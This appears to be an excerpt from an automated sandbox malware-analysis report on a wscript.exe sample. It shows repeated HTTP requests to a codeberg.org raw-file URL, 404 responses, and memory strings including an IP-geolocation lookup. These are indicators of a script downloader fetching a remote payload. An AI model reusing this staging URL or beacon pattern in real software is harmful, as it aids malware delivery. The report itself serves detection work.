        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: global trafficHTTP traffic detected: GET /yusef.uyo/uyo.salif.code/raw/branch/main/netilify HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: codeberg.orgConnection: Keep-AliveCookie: i_like_gitea=9b57cd302e2f8115; _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA
        Source: unknownDNS traffic detected: queries for: codeberg.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8set-cookie: i_like_gitea=9b57cd302e2f8115; Path=/; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Laxset-cookie: _csrf=HNALZbH0QlYk_CAepQ2pjagAzjQ6MTcxMjY3ODE1MDY5Nzk4MjY1OA; Path=/; Max-Age=86400; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Laxdate: Tue, 09 Apr 2024 15:55:50 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:55:53 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:55:56 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:55:58 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:01 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:05 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:08 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:10 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:13 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:16 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:19 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:21 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:25 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:28 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:31 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:33 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:36 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:39 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:43 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:46 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:49 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:51 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:54 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:56:58 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:57:01 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:57:04 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:57:06 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcache-control: max-age=0, private, must-revalidate, no-transformcontent-type: text/plain;charset=utf-8date: Tue, 09 Apr 2024 15:57:09 GMTcontent-length: 11strict-transport-security: max-age=63072000; includeSubDomains; preloadpermissions-policy: interest-cohort=()x-frame-options: sameoriginx-content-type-options: nosniffconnection: close
        Source: wscript.exe, 00000001.00000003.1211149901.000001A3BFFB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1210816033.000001A3BFFB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3698182395.000001A3C35B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3697719623.000001A3C34F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/(
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/-8
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/82-00AA004BA90B
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/od
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/tilify
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify0
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1MVx4
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify1TXlQ
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify2MVx4
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify2RFx4
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify3NVx4
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NTJc
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NjVc
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4Njdc
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify4NzNc
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilify7DQpp
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyA
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyB
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyDXHg2
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyF
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyFIiwi
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyFXHg2
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyL
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyPWzU4
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyPWzYw
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyTZH
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C3565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyX
        Source: wscript.exe, 00000001.00000002.3697719623.000001A3C34BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifyalif.code/raw/branch/main/neti
        Source: wscript.exe, 00000001.00000002.3694699942.000001A3C2360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codeberg.org/yusef.uyo/uyo.salif.code/raw/branch/main/netilifybMTgy
